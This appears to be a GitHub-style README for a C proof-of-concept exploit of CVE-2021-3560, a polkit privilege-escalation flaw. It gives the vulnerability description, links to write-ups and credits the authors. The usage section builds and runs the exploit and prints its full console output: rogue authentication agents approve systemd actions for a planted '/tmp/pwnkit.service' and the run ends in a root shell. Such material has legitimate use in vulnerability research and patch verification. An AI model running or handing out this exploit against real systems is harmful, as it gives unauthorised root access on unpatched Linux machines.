
CVE-2021-3560 PoC — polkit code issue vulnerability

Related vulnerability
Title: polkit code issue vulnerability (CVE-2021-3560)
Description: polkit is a component that controls system-wide privileges in Unix-like operating systems. By defining and auditing authorization rules, it mediates communication between processes of different privilege levels. polkit contains a code issue vulnerability: when the requesting process disconnects from dbus-daemon before polkit_system_bus_name_get_creds_sync is called, polkit cannot obtain the unique uid and pid of that process and therefore cannot verify the privileges of the requesting process.
Description
PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)

Introduction

PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)
====
C implementation of the CVE-2021-3560 exploit; blog posts describing this exploitation method:
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation

### Contributors
Code by swing (@WinMin), Ricter Z (@RicterZ)

### Usage
```console
dev@server:/tmp/CVE-2021-3560$ make
dev@server:/tmp/CVE-2021-3560$ ./exploit
pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin
pid:264181 - [*] main process running ...
pid:264183 - [*] starting polkit authentication agent ...
pid:264182 - [*] starting polkit authentication agent ...
pid:264185 - [*] starting polkit authentication agent ...
pid:264183 - [*] trying to register authentication agent to polkit ...
pid:264182 - [*] trying to register authentication agent to polkit ...
pid:264183 - [+] polkit authentication agent registered successfully!
pid:264183 - [+] D-Bus message loop now running ..
pid:264185 - [*] trying to register authentication agent to polkit ...
pid:264182 - [+] polkit authentication agent registered successfully!
pid:264182 - [+] D-Bus message loop now running ..
pid:264185 - [+] polkit authentication agent registered successfully!
pid:264185 - [+] D-Bus message loop now running ..
pid:264183 - [*] trying to enable system unit file '/tmp/pwnkit.service' ...
pid:264182 - [*] trying to start systemd service 'pwnkit.service' ...
pid:264185 - [*] trying to reload systemd daemon ...
pid:264183 - [+] received authentication for action 'org.freedesktop.systemd1.manage-unit-files' ...
pid:264183 - [*] sending agent response with cookie: 61-bf243e2d0039ce513f32553f945c80d7-1-dddae4b0320b4030370585c13b6a9985
pid:264182 - [+] received authentication for action 'org.freedesktop.systemd1.manage-units' ...
pid:264182 - [*] sending agent response with cookie: 62-c23ffa64bf9c05a1ca8bf057d56a9dfd-1-8d220cfb275f861dcfacd340fc5a578a
pid:264185 - [+] received authentication for action 'org.freedesktop.systemd1.reload-daemon' ...
pid:264185 - [*] sending agent response with cookie: 63-3b99bb8ff0b6b3ffcb7e6103fbe86073-1-6d47c6a380691defd9c455eba617513d
pid:264181 - [+] file exists, popping root shell ...
pwned-5.0# id
uid=1000(dev) gid=1000(dev) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(dev)
pwned-5.0#
```